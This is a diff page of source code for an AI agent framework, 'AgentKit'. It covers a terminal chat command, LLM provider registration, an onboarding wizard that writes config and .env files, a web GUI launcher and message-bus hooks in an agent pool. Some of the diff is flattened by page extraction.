    server_config = ServerConfig.from_yaml(config_path)

    # ── Build in-process components ───────────────────────────────
    from agentkit.session.manager import SessionManager
    from agentkit.session.store import InMemorySessionStore
    from agentkit.session.models import MessageRole
    from agentkit.core.react import ReActEngine
    from agentkit.tools.base import Tool
    from agentkit.memory.profile import MemoryStore
    from agentkit.tools.memory_tool import MemoryTool
    from agentkit.tools.shell import ShellTool
    from agentkit.tools.web_search import WebSearchTool
    from agentkit.tools.web_crawl import WebCrawlTool
    from agentkit.chat.skill_routing import resolve_skill_routing

    # Build LLM Gateway
    gateway = _build_gateway(server_config)

    # Initialize memory store
    memory_store = MemoryStore()
    memory_store.ensure_defaults()
    memory_snapshot = memory_store.load_all()

    # Create session
    session_manager = SessionManager(store=InMemorySessionStore())
    session = await session_manager.create_session(agent_name=agent_name)

    # Build tools list — all available tools for chat mode
    search_api_keys = _extract_search_keys(server_config)
    tools: list[Tool] = [
        MemoryTool(memory_store=memory_store),
        ShellTool(working_dir=os.getcwd()),
        WebSearchTool(**search_api_keys),
        WebCrawlTool(),
    ]

    # ── Load skills and build IntentRouter ───────────────────────
    from agentkit.tools.registry import ToolRegistry
    from agentkit.skills.registry import SkillRegistry
    from agentkit.skills.loader import SkillLoader
    from agentkit.router.intent import IntentRouter

    tool_registry = ToolRegistry()
    for tool in tools:
        tool_registry.register(tool)

    skill_registry = SkillRegistry()
    if server_config.skill_paths:
        loader = SkillLoader(skill_registry=skill_registry, tool_registry=tool_registry)
        for skill_path in server_config.skill_paths:
            p = Path(skill_path)
            if p.is_dir():
                loaded = loader.load_from_directory(str(p))
                if loaded:
                    rprint(f"[dim]Loaded {len(loaded)} skills from {p}[/dim]")
            elif p.is_file() and p.suffix in (".yaml", ".yml"):
                try:
                    loader.load_from_file(str(p))
                except Exception as exc:
                    # A broken skill file must not block the chat, but it
                    # should not vanish without a trace either.
                    logging.getLogger(__name__).warning(
                        f"Failed to load skill file '{p}': {exc}"
                    )

    intent_router = IntentRouter(llm_gateway=gateway) if skill_registry.list_skills() else None

    # Build system prompt — inject memory into system prompt
    base_prompt = system_prompt or (
        "你是一个有帮助的AI助手。请记住我们对话的上下文并在后续对话中引用之前的内容。回答要清晰简洁请使用中文回复。"
    )
    effective_system_prompt = memory_store.build_system_prompt(memory_snapshot, base_prompt)

    # Resolve agent display name from the identity section of SOUL.md
    agent_display_name = _extract_display_name(
        memory_store.get_file("soul").read_section("身份"),
        agent_name,
    )

    # ── Welcome banner ────────────────────────────────────────────
    effective_model = model if model != "default" else _resolve_default_model(server_config)
    rprint(Panel(
        f"[bold]AgentKit Chat[/bold]\n\n"
        f" Model: [cyan]{effective_model}[/cyan]\n"
        f" Agent: [cyan]{agent_display_name}[/cyan]\n"
        f" Session: [dim]{session.session_id[:8]}...[/dim]\n\n"
        f" Type your message and press Enter.\n"
        f" [dim]/help[/dim] — Show commands\n"
        f" [dim]/clear[/dim] — Clear conversation\n"
        f" [dim]/model <name>[/dim] — Switch model\n"
        f" [dim]/quit[/dim] — Exit chat",
        title="AgentKit",
        border_style="bright_blue",
    ))

    # ── Chat loop ─────────────────────────────────────────────────
    react_engine = ReActEngine(llm_gateway=gateway)
    current_model = effective_model
    conversation_had_messages = False

    while True:
        try:
            user_input = Prompt.ask("\n[bold green]You[/bold green]")
        except (EOFError, KeyboardInterrupt):
            rprint("\n[dim]Goodbye![/dim]")
            break

        if not user_input.strip():
            continue

        # Handle commands
        if user_input.startswith("/"):
            raw_cmd = user_input.strip()
            # Command names are matched case-insensitively...
            cmd = raw_cmd.lower()
            if cmd in ("/quit", "/q", "/exit"):
                rprint("[dim]Goodbye![/dim]")
                break
            elif cmd == "/help":
                _print_help()
                continue
            elif cmd == "/clear":
                # Create a new session (memory files persist)
                session = await session_manager.create_session(agent_name=agent_name)
                rprint("[dim]Conversation cleared. New session started.[/dim]")
                continue
            elif cmd.startswith("/model "):
                # ...but the model name keeps the case the user typed.
                current_model = raw_cmd.split(" ", 1)[1].strip()
                rprint(f"[dim]Switched to model: {current_model}[/dim]")
                continue
            else:
                rprint(f"[yellow]Unknown command: {cmd}[/yellow]")
                continue

        conversation_had_messages = True

        # Append user message to session
        await session_manager.append_message(
            session_id=session.session_id,
            role=MessageRole.USER,
            content=user_input,
        )

        # Get full conversation history (includes all previous turns)
        chat_messages = await session_manager.get_chat_messages(session.session_id)

        # ── Skill routing ─────────────────────────────────────────
        routing = await resolve_skill_routing(
            content=user_input,
            skill_registry=skill_registry,
            intent_router=intent_router,
            default_tools=tools,
            default_system_prompt=effective_system_prompt,
            default_model=current_model,
            default_agent_name=agent_name,
            session_id=session.session_id,
        )

        if routing.matched:
            rprint(f"[dim]Skill: {routing.skill_name} ({routing.match_method}, {int(routing.match_confidence * 100)}%)[/dim]")

        exec_system_prompt = routing.system_prompt
        exec_tools = routing.tools
        exec_model = routing.model

        # Print Agent label before streaming
        rprint(f"\n[bold blue]{agent_display_name}[/bold blue]: ", end="")

        # Execute Agent
        try:
            if no_stream:
                # Non-streaming mode
                result = await react_engine.execute(
                    messages=chat_messages,
                    tools=exec_tools,
                    model=exec_model,
                    agent_name=routing.skill_name or agent_name,
                    system_prompt=exec_system_prompt,
                )
                output = result.output if hasattr(result, "output") else str(result)
                rprint(output)

                await session_manager.append_message(
                    session_id=session.session_id,
                    role=MessageRole.ASSISTANT,
                    content=output,
                    agent_name=agent_name,
                )
            else:
                # Streaming mode — Live displays under the "Agent:" label
                full_content = ""
                with Live(
                    Text(""),
                    refresh_per_second=15,
                    vertical_overflow="visible",
                    transient=False,  # Keep final output on screen
                ) as live:
                    async for event in react_engine.execute_stream(
                        messages=chat_messages,
                        tools=exec_tools,
                        model=exec_model,
                        agent_name=routing.skill_name or agent_name,
                        system_prompt=exec_system_prompt,
                    ):
                        if event.event_type == "token":
                            token = event.data.get("content", "")
                            full_content += token
                            live.update(Text(full_content))
                        elif event.event_type == "final_answer":
                            # Use final_answer output (may differ slightly from accumulated tokens)
                            full_content = event.data.get("output", full_content)
                            live.update(Markdown(full_content))
                        elif event.event_type == "tool_call":
                            tool_name = event.data.get("tool_name", "unknown")
                            live.update(Text(f"[calling tool: {tool_name}...]"))
                        elif event.event_type == "tool_result":
                            # After tool result, show accumulated content again
                            if full_content:
                                live.update(Text(full_content))

                # Live already displayed the final content, no need to rprint again
                await session_manager.append_message(
                    session_id=session.session_id,
                    role=MessageRole.ASSISTANT,
                    content=full_content,
                    agent_name=agent_name,
                )
        except Exception as e:
            rprint(f"\n[red]Error: {e}[/red]")

    # ── Session end: generate daily log ────────────────────────────
    if conversation_had_messages:
        try:
            messages = await session_manager.get_messages(session.session_id)
            if messages:
                # Build a brief summary of the conversation
                summary_parts = []
                for msg in messages[-10:]:  # Last 10 messages
                    role = msg.role.value if hasattr(msg.role, "value") else str(msg.role)
                    summary_parts.append(f"{role}: {msg.content[:100]}")
                summary = "\n".join(summary_parts)

                daily = memory_store.get_file("daily")
                existing = daily.read()
                new_entry = f"## 会话摘要\n{summary}"
                if existing:
                    daily.write(f"{existing}\n\n{new_entry}")
                else:
                    daily.write(new_entry)

                # Archive old daily logs
                memory_store.archive_old_dailies(keep_days=2)
        except Exception:
            pass  # Daily log generation is best-effort
def _extract_search_keys(server_config: "ServerConfig") -> dict[str, str]:
"""Extract search API keys from server config environment."""
return {
"tavily_api_key": os.environ.get("TAVILY_API_KEY"),
"serper_api_key": os.environ.get("SERPER_API_KEY"),
}
def _build_gateway(server_config: "ServerConfig") -> "LLMGateway":
    """Create an LLMGateway and register every provider that has an API key.

    Providers whose ``type`` is ``"anthropic"`` or ``"gemini"`` get their
    dedicated provider class; any other type is registered as an
    OpenAI-compatible provider. A provider that fails to construct or
    register is logged as a warning and skipped.

    Args:
        server_config: Configuration whose ``llm_config.providers`` mapping
            is iterated.

    Returns:
        The gateway with all successfully built providers registered.
    """
    import logging

    from agentkit.llm.gateway import LLMGateway
    from agentkit.llm.providers.anthropic import AnthropicProvider
    from agentkit.llm.providers.gemini import GeminiProvider
    from agentkit.llm.providers.openai import OpenAICompatibleProvider

    gateway = LLMGateway(config=server_config.llm_config)

    for provider_name, settings in server_config.llm_config.providers.items():
        # Providers without a key cannot be called; leave them unregistered.
        if not settings.api_key:
            continue
        try:
            kind = settings.type
            if kind == "anthropic":
                if settings.models:
                    first_model = list(settings.models.keys())[0]
                else:
                    first_model = "claude-sonnet-4-20250514"
                provider = AnthropicProvider(
                    api_key=settings.api_key,
                    model=first_model,
                    max_tokens=settings.max_tokens,
                    base_url=settings.base_url or "https://api.anthropic.com",
                    timeout=settings.timeout,
                )
            elif kind == "gemini":
                if settings.models:
                    first_model = list(settings.models.keys())[0]
                else:
                    first_model = "gemini-2.0-flash"
                provider = GeminiProvider(
                    api_key=settings.api_key,
                    model=first_model,
                    max_output_tokens=settings.max_tokens,
                    base_url=settings.base_url or "https://generativelanguage.googleapis.com",
                    timeout=settings.timeout,
                )
            else:
                provider = OpenAICompatibleProvider(
                    api_key=settings.api_key,
                    base_url=settings.base_url,
                )
            gateway.register_provider(provider_name, provider)
        except Exception as exc:
            # One broken provider must not prevent the others from loading.
            logging.getLogger(__name__).warning(
                f"Failed to register LLM provider '{provider_name}': {exc}"
            )

    return gateway
def _resolve_default_model(server_config: "ServerConfig") -> str:
    """Pick the model identifier the chat session should start with.

    Resolution order:
      1. the ``default`` entry of ``llm_config.model_aliases``;
      2. ``"<provider>/<first model>"`` of the first provider that has both
         an API key and at least one model;
      3. the literal string ``"default"``.

    Args:
        server_config: Configuration providing ``llm_config``.

    Returns:
        The resolved model string.
    """
    llm_config = server_config.llm_config

    aliases = llm_config.model_aliases
    if aliases and "default" in aliases:
        return aliases["default"]

    # No explicit alias: fall back to the first usable provider.
    for provider_name, settings in llm_config.providers.items():
        if not (settings.api_key and settings.models):
            continue
        leading_model = next(iter(settings.models.keys()))
        return f"{provider_name}/{leading_model}"

    return "default"
def _load_dotenv(dotenv_path: str) -> None:
    """Load ``KEY=VALUE`` pairs from a .env file into ``os.environ``.

    Blank lines, ``#`` comment lines and lines without ``=`` are ignored.
    A leading ``export `` on the key is dropped. Variables that already
    exist in the environment are never overwritten.

    Args:
        dotenv_path: Path of the .env file. Nothing happens when it does not
            point at a regular file.
    """
    from pathlib import Path

    path = Path(dotenv_path)
    # is_file() also rejects directories, which open() would fail on.
    if not path.is_file():
        return

    with open(path, encoding="utf-8") as f:
        for raw_line in f:
            line = raw_line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue

            key, _, value = line.partition("=")
            key = key.strip()
            # Accept shell-style "export KEY=value" lines.
            if key.startswith("export "):
                key = key[len("export "):].strip()

            value = value.strip()
            # Remove exactly one pair of matching surrounding quotes. Stripping
            # every quote character from both ends would corrupt values that
            # legitimately start or end with a quote.
            if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
                value = value[1:-1]

            if key and key not in os.environ:
                os.environ[key] = value
def _print_help() -> None:
    """Print the chat slash-command reference and usage tips in a Rich panel."""
    help_markup = (
        "[bold]Chat Commands[/bold]\n\n"
        " [cyan]/help[/cyan] — Show this help\n"
        " [cyan]/clear[/cyan] — Clear conversation (new session)\n"
        " [cyan]/model <name>[/cyan] — Switch LLM model\n"
        " [cyan]/quit[/cyan] — Exit chat\n\n"
        "[bold]Tips[/bold]\n\n"
        # Rich treats a single backslash before "[" as an escape for the tag,
        # which would print "[/cyan]" literally and leave the cyan style open.
        # Two backslashes in the markup render as one literal backslash
        # followed by a real closing tag.
        " • Multi-line input: end a line with [cyan]\\\\[/cyan] to continue\n"
        " • Your conversation is stored in memory for the session"
    )
    rprint(Panel(help_markup, border_style="dim"))

View File

@ -26,6 +26,91 @@ app.command(name="usage")(usage)
from agentkit.cli.pair import pair # noqa: E402 from agentkit.cli.pair import pair # noqa: E402
app.command(name="pair")(pair) app.command(name="pair")(pair)
from agentkit.cli.chat import chat # noqa: E402
app.command(name="chat")(chat)
# NOTE: the docstring below is kept to one line because Typer shows a
# command's docstring as its --help text; longer documentation lives in
# comments instead.
#
# Flow: locate agentkit.yaml (offering the setup wizard when it is missing or
# has no LLM provider), load it together with the sibling .env, set
# AGENTKIT_GUI_MODE, optionally open a browser tab, then serve the app.
@app.command()
def gui(
    host: str = typer.Option("0.0.0.0", "--host", help="Server bind host"),
    port: int = typer.Option(8002, "--port", help="Server port"),
    config: Optional[str] = typer.Option(None, "--config", help="Path to agentkit.yaml"),
    no_open: bool = typer.Option(False, "--no-open", help="Do not open browser automatically"),
):
    """Start AgentKit with a web UI for chatting with your Agent"""
    import os
    import webbrowser
    from pathlib import Path

    import uvicorn
    from rich.prompt import Confirm

    from agentkit.server.config import ServerConfig, find_config_path
    from agentkit.cli.onboarding import run_onboarding

    def _load_config(path: str):
        """Load the YAML config, apply the sibling .env, then reload it."""
        loaded = ServerConfig.from_yaml(path)
        # The .env always sits next to the config file being loaded, so it is
        # derived from `path` on every call rather than cached.
        loaded.load_dotenv(str(Path(path).parent / ".env"))
        # Re-load after .env is applied so env vars are available to the config.
        loaded = ServerConfig.from_yaml(path)
        os.environ["AGENTKIT_CONFIG_PATH"] = path
        return loaded

    # Stays None when no config file is available. Without this binding the
    # create_app() call below would raise NameError on that path.
    server_config = None

    # Load config
    config_path = find_config_path(config)
    if config_path is None:
        rprint("[yellow]No agentkit.yaml found.[/yellow]")
        if Confirm.ask("Would you like to run the setup wizard?", default=True):
            config_path = run_onboarding(config_arg=config)
            if config_path is None:
                rprint("[red]Setup cancelled. Using defaults.[/red]")
        else:
            rprint("[dim]Using default configuration (no LLM providers).[/dim]")

    if config_path:
        rprint(f"[green]Loading config from {config_path}[/green]")
        server_config = _load_config(config_path)

        # Check if LLM API key is configured
        if not server_config.has_llm_provider():
            rprint("[yellow]No LLM API key configured.[/yellow]")
            if Confirm.ask("Would you like to run the setup wizard?", default=True):
                new_config_path = run_onboarding(config_arg=config)
                if new_config_path is None:
                    rprint("[red]Setup cancelled. GUI may not function correctly without API key.[/red]")
                else:
                    # The wizard may write to a different directory than the
                    # original config; reload from the new location.
                    config_path = new_config_path
                    server_config = _load_config(config_path)
            else:
                rprint("[dim]Continuing without LLM provider — chat will not work.[/dim]")

    # Signal to create_app that we want GUI mode (must be set before lifespan runs)
    os.environ["AGENTKIT_GUI_MODE"] = "1"

    # Browser always opens localhost, server binds to configured host
    browser_url = f"http://localhost:{port}"
    rprint(f"[green]Starting AgentKit GUI — open {browser_url} in your browser[/green]")

    if not no_open:
        import threading

        def _open_browser():
            import time
            # Give the server a moment to start listening before opening the tab.
            time.sleep(2.0)
            webbrowser.open(browser_url)

        threading.Thread(target=_open_browser, daemon=True).start()

    # Create app directly (not factory mode) so server_config with resolved API keys
    # is passed through without relying on env var inheritance in multiprocessing.
    from agentkit.server.app import create_app

    if server_config is not None:
        asgi_app = create_app(server_config=server_config)
    else:
        # NOTE(review): assumes create_app() can be called without arguments
        # and then uses its own defaults — confirm against app.py.
        asgi_app = create_app()

    uvicorn.run(
        asgi_app,  # Direct app instance, not factory string
        host=host,
        port=port,
    )
@app.command() @app.command()
def serve( def serve(
@ -41,10 +126,22 @@ def serve(
import uvicorn import uvicorn
from agentkit.server.config import ServerConfig, find_config_path from agentkit.server.config import ServerConfig, find_config_path
from agentkit.cli.onboarding import needs_onboarding, run_onboarding
# Load .env file if present # Load .env file if present
config_path = find_config_path(config) config_path = find_config_path(config)
# Onboarding check
if config_path is None:
rprint("[yellow]No agentkit.yaml found.[/yellow]")
from rich.prompt import Confirm
if Confirm.ask("Would you like to run the setup wizard?", default=True):
config_path = run_onboarding(config_arg=config)
if config_path is None:
rprint("[red]Setup cancelled. Using defaults.[/red]")
else:
rprint("[dim]Using default configuration (no LLM providers).[/dim]")
if config_path: if config_path:
rprint(f"[green]Loading config from {config_path}[/green]") rprint(f"[green]Loading config from {config_path}[/green]")
server_config = ServerConfig.from_yaml(config_path) server_config = ServerConfig.from_yaml(config_path)
@ -57,6 +154,21 @@ def serve(
# Re-load config after .env is loaded (env vars now available) # Re-load config after .env is loaded (env vars now available)
server_config = ServerConfig.from_yaml(config_path) server_config = ServerConfig.from_yaml(config_path)
# Check if LLM API key is configured
if not server_config.has_llm_provider():
rprint("[yellow]No LLM API key configured.[/yellow]")
from rich.prompt import Confirm
if Confirm.ask("Would you like to run the setup wizard?", default=True):
config_path = run_onboarding(config_arg=config)
if config_path is None:
rprint("[red]Setup cancelled. Server may not function correctly without API key.[/red]")
else:
server_config = ServerConfig.from_yaml(config_path)
server_config.load_dotenv(str(dotenv))
server_config = ServerConfig.from_yaml(config_path)
else:
rprint("[dim]Continuing without LLM provider — API calls will fail.[/dim]")
# CLI args override config file for task_store # CLI args override config file for task_store
if task_store_backend is not None: if task_store_backend is not None:
server_config.task_store["backend"] = task_store_backend server_config.task_store["backend"] = task_store_backend

View File

@ -0,0 +1,316 @@
"""Onboarding flow — interactive first-time configuration wizard.
When no agentkit.yaml exists, this wizard guides the user through:
1. Choosing an LLM provider
2. Entering API key
3. Selecting a default model
4. Generating agentkit.yaml + .env
"""
from __future__ import annotations
import os
from pathlib import Path
from typing import Any
import yaml
from rich.panel import Panel
from rich.prompt import Prompt, Confirm
from rich import print as rprint
from agentkit.server.config import find_config_path
# ── Provider presets ──────────────────────────────────────────────────
# Built-in provider templates offered by the onboarding wizard, keyed by the
# provider id that becomes the key under `llm.providers` in agentkit.yaml.
# Fields of each preset, as consumed by run_onboarding():
#   name          - label shown in the provider menu
#   env_key       - environment variable that stores the API key; written to
#                   .env and referenced from the YAML as ${env_key}
#   base_url      - copied verbatim into the provider config
#   type          - copied verbatim into the provider config
#   models        - model id -> per-model options; an "alias" option becomes
#                   an entry in `llm.model_aliases`
#   default_model - model marked "recommended" and preselected in the menu
# NOTE: "bailian-coding" and "qwen" share the same env_key, so picking both
# in one wizard run stores a single key for the two of them.
PROVIDER_PRESETS: dict[str, dict[str, Any]] = {
    "deepseek": {
        "name": "DeepSeek",
        "env_key": "DEEPSEEK_API_KEY",
        "base_url": "https://api.deepseek.com/v1",
        "type": "openai",
        "models": {
            "deepseek-chat": {"alias": "default"},
            "deepseek-reasoner": {"alias": "reasoning"},
        },
        "default_model": "deepseek-chat",
    },
    "openai": {
        "name": "OpenAI",
        "env_key": "OPENAI_API_KEY",
        "base_url": "https://api.openai.com/v1",
        "type": "openai",
        "models": {
            "gpt-4o": {"alias": "default"},
            "gpt-4o-mini": {"alias": "fast"},
        },
        "default_model": "gpt-4o",
    },
    "bailian-coding": {
        "name": "百炼 Coding Plan",
        "env_key": "DASHSCOPE_API_KEY",
        "base_url": "https://coding.dashscope.aliyuncs.com/v1",
        "type": "openai",
        "models": {
            "qwen3.7-plus": {"alias": "default"},
            "qwen3.6-plus": {},
            "qwen3.5-plus": {},
            "qwen3-max-2026-01-23": {},
            "qwen3-coder-plus": {"alias": "coder"},
            "qwen3-coder-next": {},
            "kimi-k2.5": {},
            "glm-5": {},
            "glm-4.7": {},
            "MiniMax-M2.5": {},
        },
        "default_model": "qwen3.7-plus",
    },
    "qwen": {
        "name": "通义千问 (Qwen/DashScope)",
        "env_key": "DASHSCOPE_API_KEY",
        "base_url": "https://dashscope.aliyuncs.com/compatible-mode/v1",
        "type": "openai",
        "models": {
            "qwen-plus": {"alias": "default"},
            "qwen-turbo": {"alias": "fast"},
        },
        "default_model": "qwen-plus",
    },
    "doubao": {
        "name": "豆包 (Doubao)",
        "env_key": "DOUBAO_API_KEY",
        "base_url": "https://ark.cn-beijing.volces.com/api/v3",
        "type": "openai",
        "models": {
            "doubao-pro-32k": {"alias": "default"},
        },
        "default_model": "doubao-pro-32k",
    },
    "gemini": {
        "name": "Google Gemini",
        "env_key": "GEMINI_API_KEY",
        "base_url": "https://generativelanguage.googleapis.com",
        "type": "gemini",
        "models": {
            "gemini-2.0-flash": {"alias": "default"},
        },
        "default_model": "gemini-2.0-flash",
    },
    "anthropic": {
        "name": "Anthropic Claude",
        "env_key": "ANTHROPIC_API_KEY",
        "base_url": "https://api.anthropic.com",
        "type": "anthropic",
        "models": {
            "claude-sonnet-4-20250514": {"alias": "default"},
        },
        "default_model": "claude-sonnet-4-20250514",
    },
}
def needs_onboarding(config_arg: str | None = None) -> bool:
    """Tell whether the setup wizard should be offered.

    Args:
        config_arg: Optional explicit config path, forwarded to
            ``find_config_path``.

    Returns:
        True when ``find_config_path`` locates no configuration file.
    """
    located = find_config_path(config_arg)
    return located is None
def run_onboarding(
    output_dir: str = ".",
    config_arg: str | None = None,
) -> str | None:
    """Run the interactive onboarding wizard.

    Prompts for an LLM provider, its API key, a default model and an optional
    second provider, then writes ``agentkit.yaml`` and ``.env`` into
    ``output_dir``. Finally asks for the agent's name, personality and
    speaking style and stores them through ``MemoryStore``.

    Existing ``agentkit.yaml`` and ``.env`` files in ``output_dir`` are
    overwritten.

    Args:
        output_dir: Directory that receives the generated files; created when
            missing.
        config_arg: Accepted for call-site compatibility; the wizard does not
            read it.

    Returns:
        Path to the generated config file, or None if cancelled.
    """
    rprint(Panel(
        "[bold]Welcome to AgentKit![/bold]\n\n"
        "No configuration file found. Let's set up your first Agent.\n"
        "This will create [cyan]agentkit.yaml[/cyan] and [cyan].env[/cyan] for you.",
        title="AgentKit Setup",
        border_style="bright_blue",
    ))

    output_path = Path(output_dir).resolve()
    output_path.mkdir(parents=True, exist_ok=True)

    # ── Step 1: Choose LLM provider ──────────────────────────────
    rprint("\n[bold]Step 1: Choose your LLM provider[/bold]")
    provider_keys = list(PROVIDER_PRESETS.keys())
    for i, key in enumerate(provider_keys, 1):
        preset = PROVIDER_PRESETS[key]
        rprint(f" [cyan]{i}[/cyan]. {preset['name']}")

    choice = Prompt.ask(
        "\nSelect a provider",
        choices=[str(i) for i in range(1, len(provider_keys) + 1)],
        default="1",
    )
    selected_key = provider_keys[int(choice) - 1]
    preset = PROVIDER_PRESETS[selected_key]
    rprint(f"\n[green]Selected: {preset['name']}[/green]")

    # ── Step 2: Enter API key ─────────────────────────────────────
    rprint("\n[bold]Step 2: Enter your API key[/bold]")
    rprint(f"You can get one from the {preset['name']} dashboard.")
    api_key = Prompt.ask(
        f" {preset['env_key']}",
        password=True,
    )
    if not api_key.strip():
        rprint("[red]API key is required. Onboarding cancelled.[/red]")
        return None

    # ── Step 2b: Select default model ────────────────────────────
    available_models = list(preset["models"].keys())
    if len(available_models) > 1:
        rprint("\n[bold]Step 2b: Select your default model[/bold]")
        for i, model in enumerate(available_models, 1):
            alias = preset["models"][model].get("alias", "")
            alias_str = f" [dim]({alias})[/dim]" if alias else ""
            recommended = " [green]← recommended[/green]" if model == preset.get("default_model") else ""
            rprint(f" [cyan]{i}[/cyan]. {model}{alias_str}{recommended}")

        model_choice = Prompt.ask(
            "Select default model",
            choices=[str(i) for i in range(1, len(available_models) + 1)],
            default=str(available_models.index(preset.get("default_model", available_models[0])) + 1),
        )
        selected_model = available_models[int(model_choice) - 1]

        # Rebuild the models dict on a copy so the shared PROVIDER_PRESETS
        # table is never mutated: the chosen model gets the "default" alias
        # and every other model loses it (other aliases are kept).
        updated_models: dict[str, Any] = {}
        for model, conf in preset["models"].items():
            if model == selected_model:
                updated_models[model] = {**conf, "alias": "default"}
            else:
                updated_models[model] = {k: v for k, v in conf.items() if k != "alias" or v != "default"}
        preset = {**preset, "models": updated_models}
        rprint(f"[green]Selected: {selected_model}[/green]")
    else:
        selected_model = available_models[0]

    # ── Step 2c: Optional — add a second provider ────────────────
    env_vars: dict[str, str] = {preset["env_key"]: api_key.strip()}
    providers_config: dict[str, Any] = {
        selected_key: {
            # Written as a ${VAR} placeholder; the secret itself goes to .env.
            "api_key": f"${{{preset['env_key']}}}",
            "base_url": preset["base_url"],
            "type": preset["type"],
            "models": preset["models"],
        }
    }
    model_aliases: dict[str, str] = {}
    for model, conf in preset["models"].items():
        alias = conf.get("alias")
        if alias:
            model_aliases[alias] = f"{selected_key}/{model}"

    if Confirm.ask("\nWould you like to add a second LLM provider (for fallback)?", default=False):
        remaining = [k for k in provider_keys if k != selected_key]
        for i, key in enumerate(remaining, 1):
            rprint(f" [cyan]{i}[/cyan]. {PROVIDER_PRESETS[key]['name']}")
        choice2 = Prompt.ask(
            "Select second provider (or press Enter to skip)",
            choices=[str(i) for i in range(1, len(remaining) + 1)] + [""],
            default="",
        )
        if choice2:
            key2 = remaining[int(choice2) - 1]
            preset2 = PROVIDER_PRESETS[key2]
            api_key2 = Prompt.ask(f" {preset2['env_key']}", password=True)
            if api_key2.strip():
                env_vars[preset2["env_key"]] = api_key2.strip()
                providers_config[key2] = {
                    "api_key": f"${{{preset2['env_key']}}}",
                    "base_url": preset2["base_url"],
                    "type": preset2["type"],
                    "models": preset2["models"],
                }
                # Aliases of the first provider win; the second provider only
                # fills in aliases that are still free.
                for model, conf in preset2["models"].items():
                    alias = conf.get("alias")
                    if alias and alias not in model_aliases:
                        model_aliases[alias] = f"{key2}/{model}"

    # ── Step 3: Generate config files ─────────────────────────────
    rprint("\n[bold]Step 3: Generating configuration...[/bold]")

    config = {
        "server": {
            "host": "0.0.0.0",
            "port": 8001,
            "workers": 1,
            "rate_limit": 60,
        },
        "llm": {
            "providers": providers_config,
            "model_aliases": model_aliases,
        },
        "session": {
            "backend": "memory",
        },
        "bus": {
            "backend": "memory",
        },
        "task_store": {
            "backend": "memory",
        },
        "skills": {
            "auto_discover": True,
            "paths": ["./skills"],
        },
        "logging": {
            "level": "INFO",
            "format": "text",
        },
    }

    # Write agentkit.yaml
    config_path = output_path / "agentkit.yaml"
    with open(config_path, "w", encoding="utf-8") as f:
        yaml.dump(config, f, default_flow_style=False, allow_unicode=True, sort_keys=False)
    rprint(f" [green]Created:[/green] {config_path}")

    # Write .env
    env_path = output_path / ".env"
    env_lines = [f"{k}={v}" for k, v in env_vars.items()]
    with open(env_path, "w", encoding="utf-8") as f:
        f.write("# AgentKit Environment Variables\n")
        f.write("# Generated by onboarding wizard\n\n")
        f.write("\n".join(env_lines) + "\n")
    # The file holds API keys, so restrict it to the owner. Best effort only:
    # some platforms and filesystems do not support POSIX permission bits.
    try:
        os.chmod(env_path, 0o600)
    except OSError:
        pass
    rprint(f" [green]Created:[/green] {env_path}")

    # ── Step 4: Agent personality (optional) ──────────────────────
    rprint("\n[bold]Step 4: Customize your Agent (optional)[/bold]")
    rprint(" Press Enter to use defaults, or type your preferences.")

    agent_name = Prompt.ask(" Agent name", default="AgentKit")
    personality = Prompt.ask(" Personality", default="专业、友好、注重细节")
    speaking_style = Prompt.ask(" Speaking style", default="简洁清晰")

    # Create SOUL.md
    from agentkit.memory.profile import MemoryStore

    memory_store = MemoryStore(base_dir=Path.home() / ".agentkit")
    soul_content = f"""## 身份
我是{agent_name}一个专业的 AI 助手
## 性格
{personality}
## 说话方式
{speaking_style}
## 做事准则
- 准确回答用户问题
- 主动记住用户提到的偏好和信息
- 不确定时坦诚说明
"""
    memory_store.get_file("soul").write(soul_content.strip())
    rprint(" [green]Created:[/green] ~/.agentkit/SOUL.md")

    rprint(Panel(
        "[bold green]Setup complete![/bold green]\n\n"
        "You can now run:\n"
        " [cyan]agentkit chat[/cyan] — Start chatting with your Agent\n"
        " [cyan]agentkit serve[/cyan] — Start the API server",
        border_style="green",
    ))

    return str(config_path)

View File

@ -1,7 +1,7 @@
"""AgentPool - 运行时 Agent 实例池""" """AgentPool - 运行时 Agent 实例池"""
import logging import logging
from typing import TYPE_CHECKING from typing import TYPE_CHECKING, Any
from agentkit.core.config_driven import ConfigDrivenAgent from agentkit.core.config_driven import ConfigDrivenAgent
from agentkit.core.protocol import AgentStatus from agentkit.core.protocol import AgentStatus
@ -24,12 +24,14 @@ class AgentPool:
skill_registry: SkillRegistry, skill_registry: SkillRegistry,
tool_registry: ToolRegistry | None = None, tool_registry: ToolRegistry | None = None,
compressor: "CompressionStrategy | None" = None, compressor: "CompressionStrategy | None" = None,
message_bus: Any = None,
): ):
self._agents: dict[str, ConfigDrivenAgent] = {} self._agents: dict[str, ConfigDrivenAgent] = {}
self._llm_gateway = llm_gateway self._llm_gateway = llm_gateway
self._skill_registry = skill_registry self._skill_registry = skill_registry
self._tool_registry = tool_registry or ToolRegistry() self._tool_registry = tool_registry or ToolRegistry()
self._compressor = compressor self._compressor = compressor
self._message_bus = message_bus
async def create_agent(self, config) -> ConfigDrivenAgent: async def create_agent(self, config) -> ConfigDrivenAgent:
"""Create and start an Agent instance """Create and start an Agent instance
@ -53,6 +55,19 @@ class AgentPool:
await agent.start() await agent.start()
self._agents[config.name] = agent self._agents[config.name] = agent
logger.info(f"Agent '{config.name}' created and started in pool") logger.info(f"Agent '{config.name}' created and started in pool")
# Register agent to MessageBus if available
if self._message_bus is not None:
try:
async def _handle_bus_message(msg):
"""Handle incoming bus messages for this agent."""
logger.debug(f"Agent '{config.name}' received bus message: {msg.topic}")
await self._message_bus.subscribe(config.name, _handle_bus_message)
logger.info(f"Agent '{config.name}' registered to MessageBus")
except Exception as e:
logger.warning(f"Failed to register agent '{config.name}' to MessageBus: {e}")
return agent return agent
async def remove_agent(self, name: str) -> None: async def remove_agent(self, name: str) -> None:
@ -60,6 +75,15 @@ class AgentPool:
agent = self._agents.pop(name, None) agent = self._agents.pop(name, None)
if agent: if agent:
await agent.stop() await agent.stop()
# Unregister from MessageBus if available
if self._message_bus is not None:
try:
await self._message_bus.unsubscribe(name)
logger.info(f"Agent '{name}' unregistered from MessageBus")
except Exception as e:
logger.warning(f"Failed to unregister agent '{name}' from MessageBus: {e}")
logger.info(f"Agent '{name}' stopped and removed from pool") logger.info(f"Agent '{name}' stopped and removed from pool")
def get_agent(self, name: str) -> ConfigDrivenAgent | None: def get_agent(self, name: str) -> ConfigDrivenAgent | None:

View File

@ -76,6 +76,16 @@ class OrchestrationResult:
